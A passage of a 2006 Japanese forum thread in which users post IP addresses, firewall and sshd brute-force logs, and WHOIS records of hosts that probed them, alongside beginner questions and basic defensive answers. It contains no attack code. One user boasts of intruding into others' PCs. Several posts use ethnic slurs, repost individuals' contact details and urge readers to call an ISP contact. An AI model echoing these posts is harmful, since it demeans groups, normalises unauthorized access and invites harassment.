[最終更新] 2005/12/21 17:32:02(JST)

上位情報
----------
株式会社ブロードバンドタワー (BroadBand Tower, Inc.)
[割り振り] 203.216.192.0/18

下位情報
----------
該当するデータがありません。
488名無しさん@お腹いっぱい。:2006/01/22(日) 22:16:33
厨な質問でごめんなさい
203.216.192.0/18とは、203.216.192.0から203.216.255.255までの範囲
の事と理解していいでしょうか?
スラッシュから後の数字、例えば上記の/18←はどういう意味なんですか
489名無しさん@お腹いっぱい。:2006/01/23(月) 01:44:55
あるエロサイトをクリックしたらワンクリック系で
それ以来「HyperText 転送プロトコル (HTTP)」で
数分おきに「警告」の画面が出てくるんですけど、
ブロックする方法教えてください。
初心者ですみませんが宜しくお願いします。
490名無しさん@お腹いっぱい。:2006/01/23(月) 09:34:33
>>488-489
セキュリティ初心者質問スレッドpart66
http://pc8.2ch.net/test/read.cgi/sec/1137657121/
491名無しさん@お腹いっぱい。:2006/01/23(月) 23:22:19
TCP SYN FLOOD攻撃
2006/01/23 02:01:12 - 2006/01/23 02:07:36
25回
IPアドレス 218.40.56.3
492名無しさん@お腹いっぱい。:2006/01/24(火) 05:20:33
Jan 24 01:31:25 *** sshd[17904]: Did not receive identification string from 61.193.184.72
Jan 24 01:34:11 *** sshd[17905]: input_userauth_request: illegal user mata
Jan 24 01:34:11 *** sshd[17905]: Failed password for illegal user mata from 61.193.184.72 port 48500 ssh2
Jan 24 01:34:11 *** sshd[17905]: Received disconnect from 61.193.184.72: 11: Bye Bye
Jan 24 01:34:11 *** sshd[17906]: input_userauth_request: illegal user sato
Jan 24 01:34:11 *** sshd[17906]: Failed password for illegal user sato from 61.193.184.72 port 48538 ssh2
Jan 24 01:34:11 *** sshd[17906]: Received disconnect from 61.193.184.72: 11: Bye Bye

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 61.193.184.64/27
b. [ネットワーク名] CMS-JAPAN
f. [組織名] シー・エム・エス・ジャパン株式会社
g. [Organization] CMS Japan K.K.
493名無しさん@お腹いっぱい。:2006/01/24(火) 18:51:30
Pネットワークアドレス
210.172.0.208/28
ネットワーク名
IR-NET
組織名
有限会社インターライズ
Organization
Inter Rise Inc.
管理者連絡窓口
FS533JP
技術連絡担当者
FS533JP
ネームサーバ
割当年月日
2004/10/07
返却年月日
最終更新
2004/10/13 10:34:02(JST)
上位情報
ソニー株式会社 (SONY Corporation)
割り振り
210.172.0.0/19
ビットドライブ (bit-drive)
SUBA-330-041 [ SUBA ] 210.172.0.0
下位情報
該当するデータがありません。

なにがしたいねん?
494名無しさん@お腹いっぱい。:2006/01/24(火) 20:45:53
あぁ、なんか知らんうちにwinstallっていうファイルがあるし…。
495名無しさん@お腹いっぱい。:2006/01/24(火) 23:50:40
IPアドレス 220.102.221.249
ホスト名 FLA1Afd249.tky.mesh.ad.jp
IPアドレス
割当国 ※ 日本 (JP)
都道府県 東京都
市外局番 --
接続回線 xDSL

いい加減にしろ
496名無しさん@お腹いっぱい。:2006/01/25(水) 22:51:28
ホスト名からIPアドレスを調べるサイト等はありますか?
497名無しさん@お腹いっぱい。:2006/01/25(水) 23:58:01
ある
498名無しさん@お腹いっぱい。:2006/01/26(木) 00:02:04
61.46.139.92
61.46.139.92
61.46.139.92
61.46.139.92
61.46.139.92
61.46.139.92
61.46.139.92
61.46.139.92
61.46.139.92
499名無しさん@お腹いっぱい。:2006/01/26(木) 00:12:44
>>496
『IP検索』とぐぐれば出てくる
500名無しさん@お腹いっぱい。:2006/01/26(木) 00:17:08
とりあえず、ドメイン覚えてるから変な事したら通報するぉwww
誰に言ってるのかは分かってるだろうけど。
501496:2006/01/26(木) 01:34:19
>>499
希望する内容のサイトがありました。ありがとうございました。
「ホスト IP」等でぐぐっても出てこなかったのに・・・
502名無しさん@お腹いっぱい。:2006/01/26(木) 02:15:30
うちのルータ
リモートホスト出ないからめんどい
503名無しさん@お腹いっぱい。:2006/01/26(木) 04:53:12
最近ルーター導入して、ファイアウォール通知する設定したら不正アクセスの多さにビックリしたよ…。
ところでそのアクセスの種類なんだけど、

・不正なパケット
・TCP SYN FLOOD攻撃
・ポートスキャン
・SMURF攻撃
・IP SPOOFING攻撃
・LAND攻撃
・UDPポートループバック攻撃

どういう攻撃なのかさっぱりわからんので、解説お願いできないでしょうか?
解説サイトでも全然OKですので。
504名無しさん@お腹いっぱい。:2006/01/26(木) 12:00:43
初心者は調べなくても質問していいとでもお思いでしょうか?
そのままググってみてそれでもわからなければまた来てください
505名無しさん@お腹いっぱい。:2006/01/26(木) 13:34:52
http://www.f-day1.net/
こいつからスパムが毎日送られてくる。

Whois 219.239.208.72
e-mail: [email protected],[email protected]
http://www.datadragon.net/Contact_us.html
Email(Service): [email protected]
Email(Sales): [email protected]
Email(Marketing): [email protected]

これらのメールアドレスに苦情メールを送っても
すべてエラーで戻ってくる。

[email protected] [email protected] [email protected]
[email protected] [email protected] [email protected]
で送っても全てエラーで戻ってくる。

データドラゴン(中国)の生きているメールアドレスを知っている方
教えてください。
506名無しさん@お腹いっぱい。:2006/01/26(木) 20:36:16
>>505
苦情メールって効果あるの?逆効果じゃないか?

http://marimo.org/spamlist.html
拒否るか、プロバイダとか、あらゆる権力動かして止める。
国内なら、多少は法律あるから対処可能だろうけどさ。
海外とか、経由してたりすると難しいんじゃね?

そもそも、自鯖なのかどうかでもだいぶ違ってくるような・・・
可能なら、自分のアドをでかいメールで埋めて許容限界にしておいて、
受け取れねーよ。を返させるぐらいしか思いつかん。
507名無しさん@お腹いっぱい。:2006/01/26(木) 20:50:58
192.168.11.1
↑ウイルスバスター2005がパトロールした結果こいつが出てきた

初歩的なことで申し訳ないんだけど、どういう状況なのか教えて欲しいッス
俺のMYPC覗かれてんの?

ってかこういう場合どうすればいいの?
508名無しさん@お腹いっぱい。:2006/01/26(木) 20:58:35
ネタはよそでやれ。
509名無しさん@お腹いっぱい。:2006/01/26(木) 21:13:34
いやネタじゃなくてガチ
サーチしても引っかからないからちょっち心配
510名無しさん@お腹いっぱい。:2006/01/26(木) 21:30:35
>>509
コマンドプロンプト開いてipconfigってやった時にデフォルトゲートウェイに192.168.11.1とか書いてあったら怒るよ
511名無しさん@お腹いっぱい。:2006/01/26(木) 21:38:35
IP: 218.46.162.128
DNS: EATcf-515p128.ppp15.odn.ne.jp
512名無しさん@お腹いっぱい。:2006/01/26(木) 21:39:06
コマンドプロンプトさえ分からないので初心者スレ行ってきます
513名無しさん@お腹いっぱい。:2006/01/26(木) 21:52:10
>>510
それって自分のIPが出るんじゃねーの? って事?
514名無しさん@お腹いっぱい。:2006/01/26(木) 22:56:40
221.25.28.7

xmas scan うぜー
515名無しさん@お腹いっぱい。:2006/01/26(木) 23:00:19
Name: softbank221025028007.bbtec.net
Address: 221.25.28.7

まーだ続けんのかよ うぜーな
516名無しさん@お腹いっぱい。:2006/01/26(木) 23:54:09
133.205.239.65,3211
Trojan送りつけるのって犯罪だべ
517名無しさん@お腹いっぱい。:2006/01/27(金) 00:20:23
こいつらうざい
2006/01/27 00:15:14 softbank218126078033.bbtec.net(218.126.78.33)
2006/01/27 00:15:25 211.204.130.43(211.204.130.43)
2006/01/27 00:17:12 OTUfb-01p2-5.ppp11.odn.ad.jp(219.66.179.5)
2006/01/27 00:17:28 bf-125.smn.enjoy.ne.jp(210.141.59.253)
2006/01/27 00:18:57 ZM041181.ppp.dion.ne.jp(222.8.41.181)
2006/01/27 00:19:16 ipvr5.csie.ncu.edu.tw(140.115.156.195)
全て TCPポート1563
518名無しさん@お腹いっぱい。:2006/01/27(金) 01:11:40
この中で実際ハッキングされた奴いてる?
何か目に見える様なことされた?
519名無しさん@お腹いっぱい。:2006/01/27(金) 06:28:29
“【電凸】ワンクリ総合スレ【http://i.pic.to/5wat4】”
http://ex14.2ch.net/test/read.cgi/news4vip/1138234319/

誰かタシケテ(;'A`)兵士と知識が足り茄子
520名無しさん@お腹いっぱい。:2006/01/27(金) 17:40:41
UDPポート 33436 のアタック しつこい
2006/01/27 17:31:57 performance-check-via-Level3.THIS_IS_HARMLESS-It_is_a_Traceroute_or_Ping_packet.BGP-route-control.data393.net(208.42.224.236)
2006/01/27 17:38:34 performance-check-via-Level3.THIS_IS_HARMLESS-It_is_a_Traceroute_or_Ping_packet.BGP-route-control.data393.net(208.42.224.236)
2006/01/27 17:38:39 performance-check-via-Level3.THIS_IS_HARMLESS-It_is_a_Traceroute_or_Ping_packet.BGP-route-control.data393.net(208.42.224.236)
2006/01/27 17:38:43 performance-check-via-Level3.THIS_IS_HARMLESS-It_is_a_Traceroute_or_Ping_packet.BGP-route-control.data393.net(208.42.224.236)
2006/01/27 17:38:48 performance-check-via-Level3.THIS_IS_HARMLESS-It_is_a_Traceroute_or_Ping_packet.BGP-route-control.data393.net(208.42.224.236)
2006/01/27 17:38:53 performance-check-via-Level3.THIS_IS_HARMLESS-It_is_a_Traceroute_or_Ping_packet.BGP-route-control.data393.net(208.42.224.236)
521名無しさん@お腹いっぱい。:2006/01/27(金) 22:04:44
俺と同じように不正アクセスされてるおまいらをみてなんか嬉しいよ・・・ヽ(`Д´)ノウワァァン
522名無しさん@お腹いっぱい。:2006/01/27(金) 23:14:55
こないださP2PやらFTP使ってる輩のPCに進入したんだが
それを知ったご当人が顔真っ赤にして「訴える」とかやたら勢い込んでるんだが
普通に考えて無理だわなw
それどころかそいつ自身P2P使用について罪に問われるんじゃないか?
そもそもそいつにもマシンにも実害自体は与えてないしw
523名無しさん@お腹いっぱい。:2006/01/27(金) 23:21:37
>>522お前って奴は・・・・・・・
524名無しさん@お腹いっぱい。:2006/01/27(金) 23:21:45
525名無しさん@お腹いっぱい。:2006/01/27(金) 23:28:35
>>523
ん?なに?
526名無しさん@お腹いっぱい。:2006/01/27(金) 23:40:21
俺は正直迷惑メールのメアドを晒したいがスレ違いだ

>>525なにもいじらなかったとしても本人の気持ちを考えろってことを言いたかった
527名無しさん@お腹いっぱい。:2006/01/28(土) 00:22:33
進入しただけでも積荷は問われるんじゃなかったっけ?
528名無しさん@お腹いっぱい。:2006/01/28(土) 16:32:37
222.170.114.149
IPアドレス 222.170.114.149
ホスト名 対応するホスト名がありません
IPアドレス
 割当国 ※ 中国 (CN)
都道府県 該当なし
市外局番 該当なし
接続回線 該当なし
529名無しさん@お腹いっぱい。:2006/01/28(土) 16:33:41
219.147.192.118

IPアドレス 219.147.192.118
ホスト名 対応するホスト名がありません
IPアドレス
 割当国 ※ 中国 (CN)
都道府県 該当なし
市外局番 該当なし
接続回線 該当なし


530名無しさん@お腹いっぱい。:2006/01/28(土) 16:43:24
61.46.139.92
61.46.139.92
61.46.139.92
61.46.139.92
61.46.139.92
61.46.139.92
61.46.139.92
61.46.139.92
61.46.139.92

ここうぜーーーーーー
531名無しさん@お腹いっぱい。:2006/01/28(土) 16:47:34
210.236.186.119
222.10.186.94
死ね!!
532名無しさん@お腹いっぱい。:2006/01/28(土) 16:53:54
219.111.127.64 さっきアクセスされたので晒しあげ
533名無しさん@お腹いっぱい。:2006/01/28(土) 17:15:17
61.124.202.87

鬱陶しい輩だが、国内のしかも同じプロバイダのIPだった。
よってこいつを単体でアクセス制限
534名無しさん@お腹いっぱい。:2006/01/28(土) 17:21:51
Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 203.141.32.0/20
b. [ネットワーク名] YAHOO-NET
f. [組織名] ヤフー株式会社
g. [Organization] Yahoo Japan Corp.
m. [管理者連絡窓口] TT9944JP
n. [技術連絡担当者] TT9944JP
p. [ネームサーバ] dnsg01.yahoo.co.jp
p. [ネームサーバ] ns10.yahoo.co.jp
[割当年月日] 2003/02/07
[最終更新] 2005/12/21 17:56:04(JST)
上位情報
----------
株式会社ブロードバンドタワー (BroadBand Tower, Inc.)
[割り振り] 203.141.32.0/19
下位情報
----------
該当するデータがありません。
Contact Information: [担当者情報]
a. [JPNICハンドル] TT9944JP
b. [氏名] 橘 俊男
c. [Last, First] Tachibana, Toshio
d. [電子メイル] [email protected]
f. [組織名] ヤフー株式会社
g. [Organization] Yahoo Japan Corporation
k. [部署] システム統括部サイトオペレーション
l. [Division] Site Operations
o. [電話番号] 03-6440-6000
p. [FAX番号] 03-6440-6265
y. [通知アドレス] [email protected]
[最終更新] 2004/06/01 17:35:02 (JST)
[email protected]
535名無しさん@お腹いっぱい。:2006/01/28(土) 17:25:30
Pアドレス 219.28.108.65
ホスト名 softbank219028108065.bbtec.net
IPアドレス
 割当国 ※ 日本 (JP)
都道府県 兵庫県
市外局番 --
接続回線 xDSL
536名無しさん@お腹いっぱい。:2006/01/28(土) 17:46:31
>>421
IPの末尾が1だったら
TCPポート1563
とか
>520 のようなアクセスが来るらしい

現在は末尾1じゃないから TCP:1563とか>520 のアクセス来てない
537名無しさん@お腹いっぱい。:2006/01/29(日) 16:32:08
220.219.199.249

延々と叩いてくるの勘弁して下さい
538名無しさん@お腹いっぱい。:2006/01/29(日) 23:29:50
IPアドレス 69.28.181.55
ホスト名 対応するホスト名がありません
IPアドレス
 割当国 ※ アメリカ合衆国 (US)
都道府県 該当なし
市外局番 該当なし
接続回線 該当なし
539名無しさん@お腹いっぱい。:2006/01/30(月) 11:12:23
58.138.16.99

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 58.138.0.0/18
b. [ネットワーク名] PPP-EXCITE
f. [組織名] エキサイト株式会社
g. [Organization] Excite Japan Co., Ltd.
m. [管理者連絡窓口] EK861JP
n. [技術連絡担当者] JF254JP
p. [ネームサーバ] ns00.cdn-japan.com
p. [ネームサーバ] ns01.cdn-japan.com
[割当年月日] 2005/05/26
[最終更新] 2005/05/26 10:47:07(JST)

上位情報
----------
株式会社インターネットイニシアティブ (Internet Initiative Japan Inc.)
[割り振り] 58.138.0.0/17

死ね
540名無しさん@お腹いっぱい。:2006/01/31(火) 16:46:54
あなたが検索されたアドレス[ 222.149.131.222 ]のJPNICからの応答は以下の通りです。

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 222.149.128.0/18
b. [ネットワーク名] OCN
f. [組織名] オープンコンピュータネットワーク
g. [Organization] Open Computer Network
m. [管理者連絡窓口] AY1361JP
n. [技術連絡担当者] MO081JP
n. [技術連絡担当者] KK551JP
n. [技術連絡担当者] IM657JP
p. [ネームサーバ] ns-kg001.ocn.ad.jp
p. [ネームサーバ] ns-kn001.ocn.ad.jp
[割当年月日] 2004/03/04
[最終更新] 2004/03/04 10:22:05(JST)

上位情報
----------
エヌ・ティ・ティ・コミュニケーションズ株式会社 (NTT COMMUNICATIONS CORPORATION)
[割り振り] 222.144.0.0/13
541名無しさん@お腹いっぱい。:2006/02/01(水) 23:23:36
219.129.21.116

支那かららしいが何度も何度もいい加減にしてくれよと…。
542名無しさん@お腹いっぱい。:2006/02/02(木) 08:21:43
>>541
それこっちにも来てるよ。
543名無しさん@お腹いっぱい。:2006/02/02(木) 16:40:28
IPアドレス 220.102.188.1
ホスト名 FLH1Abi001.osk.mesh.ad.jp

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 220.102.0.0/16
b. [ネットワーク名] BIGLOBE-9
f. [組織名] BIGLOBEサービス(日本電気株式会社)
g. [Organization] NEC Corporation
m. [管理者連絡窓口] NK032JP
n. [技術連絡担当者] MK11728JP
p. [ネームサーバ] ns02.mesh.ad.jp
p. [ネームサーバ] ns03.mesh.ad.jp
[割当年月日] 2004/04/06
[返却年月日]
[最終更新] 2004/04/06 18:53:06(JST)

上位情報
----------
日本電気株式会社 (NEC Corporation)
[割り振り] 220.102.0.0/16

下位情報
----------
該当するデータがありません。


頼むから氏んでくれ
544名無しさん@お腹いっぱい。:2006/02/02(木) 18:21:22
60.238.82.63
↑厨のIP
545名無しさん@お腹いっぱい。:2006/02/02(木) 23:09:22
IPアドレス 70.86.55.218
ホスト名 mail.symb0l2watch.com
IPアドレス
 割当国 ※ アメリカ合衆国 (US)
都道府県 該当なし
市外局番 該当なし
接続回線 該当なし
546名無しさん@お腹いっぱい。:2006/02/02(木) 23:51:13
220.146.188.45
547名無しさん@お腹いっぱい。:2006/02/04(土) 16:07:56
検索結果
IPアドレス 219.171.28.160,2856
ホスト名 softbank219171028160.bbtec.net
IPアドレス
 割当国 ※ 日本 (JP)
都道府県 宮城県
市外局番 --
接続回線 xDSL

548TCP SYN FLOOD攻撃:2006/02/04(土) 17:20:18
221.14.246.237   2006/02/01 17:55:19 - 2006/02/04 15:19:30  130回

チャンコロまじうぜえ
549名無しさん@お腹いっぱい。:2006/02/05(日) 09:34:41
221.14.246.236
221.14.246.235
221.14.246.254
221.14.246.226
221.14.246.229
221.14.246.228
221.14.246.230
550名無しさん@お腹いっぱい。:2006/02/05(日) 20:52:40
>>548-549
あーうちだけじゃないんだなぁ。
これで弾こう。

221.13.128.0 - 221.15.255.255
551名無しさん@お腹いっぱい。:2006/02/05(日) 22:19:20
221.5.251.195
中華人民共和国
552名無しさん@お腹いっぱい。:2006/02/06(月) 14:40:07
sshdが刺激されました。(ログはnlでカウント付き)
国内から馬鹿なことするなよ。

1 Feb 4 03:34:46 hostx sshd[9376]: Illegal user a from 61.213.76.189
2 Feb 4 03:34:47 hostx sshd[9379]: Illegal user b from 61.213.76.189
(中略)
1500 Feb 4 04:15:53 hostx sshd[14574]: Illegal user Owner from 61.213.76.189
1501 Feb 4 04:15:53 hostx sshd[14577]: Illegal user goober from 61.213.76.189
553名無しさん@お腹いっぱい。:2006/02/06(月) 16:49:31
j076189.ppp.asahi-net.or.jp
554名無しさん@お腹いっぱい。:2006/02/06(月) 23:24:56
555名無しさん@お腹いっぱい。:2006/02/06(月) 23:38:38
219.146.78.59

チャンコロいいかげんにせいよ!
556名無しさん@お腹いっぱい。:2006/02/07(火) 00:59:30
218.163.130.210:2061
218.163.130.210:24087
557名無しさん@お腹いっぱい。:2006/02/07(火) 03:23:45

サービス: Windows ファイル共有
ポート: 139
モード: TCP
IP アドレス: 61.121.33.16
ホスト名: ntmiex005016.miex.nt.isdn.ppp.infoweb.ne.jp

毎日来る。
そして今日はとてつもなくしつこい、、、、、、、、
558名無しさん@お腹いっぱい。:2006/02/07(火) 12:00:43
2006/02/05 23:38:26 TCP 80 221.117.59.154(221.117.59.154)
2006/02/05 23:38:27 TCP 1080 221.117.59.154(221.117.59.154)
2006/02/05 23:38:28 TCP 3128 221.117.59.154(221.117.59.154)
2006/02/05 23:38:29 TCP 8080 221.117.59.154(221.117.59.154)
2006/02/07 09:47:37 TCP 80 221.117.59.154(221.117.59.154)
2006/02/07 09:47:38 TCP 1080 221.117.59.154(221.117.59.154)
2006/02/07 09:47:39 TCP 3128 221.117.59.154(221.117.59.154)
2006/02/07 09:47:40 TCP 8080 221.117.59.154(221.117.59.154)
559名無しさん@お腹いっぱい。:2006/02/08(水) 15:25:54
560名無しさん@お腹いっぱい。:2006/02/09(木) 01:14:42
2006/02/08 23:32:42通信の要求 210.239.148.89 TCP(1746)

Domain Information: [ドメイン情報]
a. [ドメイン名] BEAUTECHLAB.CO.JP
e. [そしきめい] かぶしきがいしゃびゅーてっくらぼ
f. [組織名] 株式会社ビューテックラボ
g. [Organization] BeautechLab Corporation
k. [組織種別] 株式会社
l. [Organization Type] Company
m. [登録担当者] IM269JP
n. [技術連絡担当者] HI3229JP
n. [技術連絡担当者] RS006JP
p. [ネームサーバ] blc.beautechlab.co.jp
p. [ネームサーバ] blcsv9x.beautechlab.co.jp
p. [ネームサーバ] ns1.bit-drive.ne.jp
[状態] Connected (2006/11/30)
[登録年月日] 1999/11/26
[接続年月日] 1999/11/30
[最終更新] 2005/12/01 01:12:20 (JST)

なんの用だ
561名無しさん@お腹いっぱい。:2006/02/09(木) 01:15:22
あごめん
全部張っちゃったorz
562名無しさん@お腹いっぱい。:2006/02/09(木) 17:19:08
IPアドレス 220.109.20.140
ホスト名 i220-109-20-140.s02.a017.ap.plala.or.jp
IPアドレス
割当国 ※ 日本 (JP)
都道府県 石川県
市外局番 --
接続回線 xDSL
563名無しさん@お腹いっぱい。:2006/02/09(木) 19:12:14
IPアドレス 210.159.149.164
ホスト名 PPPbm1164.tokyo-ip.dti.ne.jp
IPアドレス
割当国 ※ 日本 (JP)
都道府県 東京都
市外局番 --
接続回線 光
564名無しさん@お腹いっぱい。:2006/02/10(金) 21:33:14
softbank221029031024.bbtec.net
565名無しさん@お腹いっぱい。:2006/02/10(金) 22:26:23
IPアドレス 221.187.59.179
ホスト名 p4179-ipbf17souka.saitama.ocn.ne.jp
IPアドレス
 割当国 ※ 日本 (JP)
都道府県 埼玉県
市外局番 --
接続回線 光

 しつこい。
566名無しさん@お腹いっぱい。:2006/02/11(土) 00:14:02
--:--:-- LOG_WARNING S03:MSQ: Discard packet. TCP(59.190.89.162:3261 -> **.***.**.**:135)
--:--:-- LOG_WARNING S03:MSQ: Discard packet. TCP(59.190.89.26:1341 -> **.***.**.**:135)
--:--:-- LOG_WARNING S03:MSQ: Discard packet. TCP(59.190.89.26:1341 -> **.***.**.**:135)
--:--:-- LOG_WARNING S03:MSQ: Discard packet. TCP(59.190.45.49:3777 -> **.***.**.**:135)
--:--:-- LOG_WARNING S03:MSQ: Discard packet. TCP(59.190.117.73:1428 -> **.***.**.**:135)
--:--:-- LOG_WARNING S03:MSQ: Discard packet. TCP(59.190.45.49:1574 -> **.***.**.**:135)
--:--:-- LOG_WARNING S03:MSQ: Discard packet. TCP(59.190.89.104:4394 -> **.***.**.**:135)
567名無しさん@お腹いっぱい。:2006/02/11(土) 03:21:42
送信日時 2006-02-11 02:45:27
送信日時 2006-02-11 02:45:30

IPアドレス 210.157.21.152
ホスト名 unused-210-157-021-152.interq.or.jp
IPアドレス
 割当国 ※ 日本 (JP)
都道府県 該当なし
市外局番 該当なし
接続回線 該当なし
568名無しさん@お腹いっぱい。:2006/02/11(土) 09:15:35
>>566
あんたのISPは eonet.ne.jp だろ
569名無しさん@お腹いっぱい。:2006/02/11(土) 10:28:20
IP:218.183.240.109
:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)

570名無しさん@お腹いっぱい。:2006/02/11(土) 16:35:14
softbank218122214010.bbtec.net
571名無しさん@お腹いっぱい。:2006/02/12(日) 03:49:26
PC初心者たくさん居るスレはこのスレですか
晒す前にもっとNWについて勉強しようね^−^
572名無しさん@お腹いっぱい。:2006/02/12(日) 05:19:19
PC上級者キテタ Y⌒Y⌒Y⌒Y⌒Y⌒Y⌒(。A。)!!!
573名無しさん@お腹いっぱい。:2006/02/12(日) 11:39:22
ttp://www.dshield.org/

1026って、Messenger Spam狙い?
発信元を偽装しているかもしれないけど中国方面からのものがコンスタントに来るね。
鬱陶しいからTCP445と135と一緒にUDP1026と1028のログは取らないようにしたら
ものすごく静かで驚くw
574名無しさん@お腹いっぱい。:2006/02/12(日) 11:47:03
パソコンの電源を切ってる時にもルータのアクセスランプがピカピカ点滅する時があるんですが、これって不正進入されかけてるのかなぁ?
575名無しさん@お腹いっぱい。:2006/02/12(日) 12:20:51
>>574
そのルータがモデムルータならその機器自体がWAN側IP取っていて
そのWAN側IPに対して侵入を試みようとしてきてるだけでしょ。
通常ならルータは必要ないものは閉じてるから点滅してても無視するだけでいい。
PCが動いていても必要なもの以外のポート開けやDMZホストに指定しなければ問題ない。
576名無しさん@お腹いっぱい。:2006/02/12(日) 13:09:33
>>575
書き忘れましたが、モデムルータです。
よって、WAN側IPは確かに常に持ってますよ。(電源入れてる間は)

やっぱりルータまでのアクセスはされるもんなのですね。ご回答ありがとうございました。
577名無しさん@お腹いっぱい。:2006/02/12(日) 17:39:28
中国、韓国、台湾、香港、イタリア、オランダ、メキシコ、ブラジルがUzeeeeeeee!!
578名無しさん@お腹いっぱい。:2006/02/12(日) 17:57:27
中国はホントダメだね
579名無しさん@お腹いっぱい。:2006/02/13(月) 05:18:43
あなたが検索されたアドレス[ 59.158.170.134 ]のJPNICからの応答は以下の通りです。

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 59.158.170.128/29
b. [ネットワーク名] HG0004230405
f. [組織名] broadgate
g. [Organization] broadgate
m. [管理者連絡窓口] AT047JP
n. [技術連絡担当者] AT047JP
p. [ネームサーバ]
[割当年月日] 2005/07/26
[最終更新] 2005/07/26 14:29:31(JST)

上位情報
----------
株式会社ユーズコミュニケーションズ (U's Communications Corp.)
[割り振り] 59.158.0.0/15
株式会社ユーズコミュニケーションズ (U's communications Corp.)
SUBA-468-0JK [SUBA] 59.158.170.0/24
580あぼーん:あぼーん
あぼーん
581名無しさん@お腹いっぱい。:2006/02/13(月) 11:55:10
あなたが検索されたアドレス[ 220.146.130.229 ]のJPNICからの応答は以下の通りです。

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 220.146.0.0/16
b. [ネットワーク名] INFOWEB
f. [組織名] InfoWeb(富士通株式会社)
g. [Organization] InfoWeb(Fujitsu Ltd.)
m. [管理者連絡窓口] KH071JP
n. [技術連絡担当者] TK13654JP
n. [技術連絡担当者] KN6902JP
p. [ネームサーバ] ns1.hyper.web.ad.jp
p. [ネームサーバ] ns3.hyper.web.ad.jp
[割当年月日] 2003/11/14
[最終更新] 2003/11/20 16:45:03(JST)

上位情報
----------
富士通株式会社 (FUJITSU LIMITED)
[割り振り] 220.146.0.0/15
582名無しさん@お腹いっぱい。:2006/02/13(月) 15:41:20
Whois全部貼ってるおまえ
ウザいから書き込むな!
583名無しさん@お腹いっぱい。:2006/02/13(月) 16:46:18
[技術連絡担当者]とか「上位情報」とかをNGワードにしてあぼ〜んしとけよ
若しくはこのスレ自体見るな
おまえいなくてもまったく困らんから
584名無しさん@お腹いっぱい。:2006/02/13(月) 20:49:51
IPアドレス 66.97.133.101
ホスト名 66-97-133-101.viawest.net
IPアドレス
 割当国 ※ アメリカ合衆国 (US

トロイの木馬
61番ポートを狙ってきた。
585名無しさん@お腹いっぱい。:2006/02/14(火) 04:57:19
ここ見て、初めてルーターのログみたんだけど、結構アクセスしてるんだね
南米、中国がわりとあった。
スパム攻撃して楽しいのかな
586名無しさん@お腹いっぱい。:2006/02/14(火) 05:11:40
PCがあっても、たいして他に何もすることねーんじゃね?
それか、馬鹿だからゾンビとか、踏み台なりまくりんぐに気付かないっぽい
ま、中韓は国策の反日教育の影響だろうけどなw
587名無しさん@お腹いっぱい。:2006/02/14(火) 23:24:42
すみません。ここにあるような不正アクセスされたとして、どんな対策をすれば良いんでしょうか?
ファイヤーウォール使ってれば、放っておいても問題ないの?
588名無しさん@お腹いっぱい。:2006/02/14(火) 23:26:06
>>587
こういうアクセスがあったよ。でも止めたよ。
っていう事をお知らせしてるだけだから気にする必要はない。
589587:2006/02/14(火) 23:30:09
>>588
ありがとうございます。
ここ2、3日ファイヤーウォールが急に反応するようになったのですが、
ググってもなんだか難しくてよく分からなかったもので・・・
590名無しさん@お腹いっぱい。:2006/02/15(水) 00:36:36
169.254.239.240
591名無しさん@お腹いっぱい。:2006/02/15(水) 23:56:42
219.182.185.1からアクセスが来てるってファイアウォールのメッセージが出続けてます。
何とかならないでしょうか?
592名無しさん@お腹いっぱい。:2006/02/16(木) 04:46:25
61.121.33.19 ntmiex005199.miex.nt.isdn.ppp.infoweb.ne.jp
593名無しさん@お腹いっぱい。:2006/02/16(木) 10:34:38
>>591
メッセージを非表示にすればいい。
594名無しさん@お腹いっぱい。:2006/02/16(木) 21:27:48
ルーターのログ見ると5秒おきくらいにTCP port 135や445にいろいろなところからアクセスがくるんですけど
多すぎますかね?ファイヤーウォール無しなので心配。
595名無しさん@お腹いっぱい。:2006/02/16(木) 23:08:13
>>594
ルータに弾いたとログが残ってるなら問題ないと思う。
596名無しさん@お腹いっぱい。:2006/02/16(木) 23:25:39
IPアドレス 203.250.33.116
ホスト名 pc033116.cataegu.ac.kr
IPアドレス
 割当国 ※ 該当なし
都道府県 該当なし
市外局番 該当なし
接続回線 該当なし
597名無しさん@お腹いっぱい。:2006/02/17(金) 00:11:12
>>595
ありがとうございます。どうやらルーターが弾いているようなので一安心です。
それにしてもまさかこんなに来てるとは…
598名無しさん@お腹いっぱい。:2006/02/17(金) 17:31:18

IPアドレス 210.157.21.152
ホスト名 unused-210-157-021-152.interq.or.jp
IPアドレス
 割当国 ※ 日本 (JP)
都道府県 該当なし
市外局番 該当なし
接続回線 該当なし
599名無しさん@お腹いっぱい。:2006/02/18(土) 20:19:36
219.146.0.0-219.147.31.255
CHINATELECOM-sd
Wang guang
[email protected]
+86-10-58501724
600名無しさん@お腹いっぱい。:2006/02/19(日) 23:19:28
60.39.125.171
601名無しさん@お腹いっぱい。:2006/02/20(月) 22:35:56
211.212.0.0-211.215.255.255
HANANET
チョン
Ihyup Sung
+82-2-106 ←今すぐtel!

211.212.15.0-211.215.15.255
HANANET-INFRA-KR
602名無しさん@お腹いっぱい。:2006/02/20(月) 22:37:00
シナチクうぜー!

211.147.243.0-211.147.248.255
603名無しさん@お腹いっぱい。:2006/02/20(月) 22:43:19
>>461で晒されてるのが最近毎日攻撃ウザイ
しね!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
604名無しさん@お腹いっぱい。:2006/02/20(月) 23:26:02
>>461
tiger505.maido3.comってmaido3.comは
この2chの借りてる鯖のはずだと思ったけど。
http://server.maido3.com/
http://maido3.com/
2ch見るとそれ働くとかそういうのじゃない?
本当に攻撃してるならテラワロスだけどw
605名無しさん@お腹いっぱい。:2006/02/20(月) 23:26:59
今後に期待age
606名無しさん@お腹いっぱい。:2006/02/21(火) 10:38:43
また461ネタか
607あぼーん:あぼーん
あぼーん
608名無しさん@お腹いっぱい。:2006/02/22(水) 02:18:20
ttp://pc7.2ch.net/test/read.cgi/mac/1137478058/l50より

378 名前: 名称未設定 Mail: chousentekitaidodehagesikuage 投稿日: 2006/02/22(水) 01:41:07 ID: //uNr7gZ0
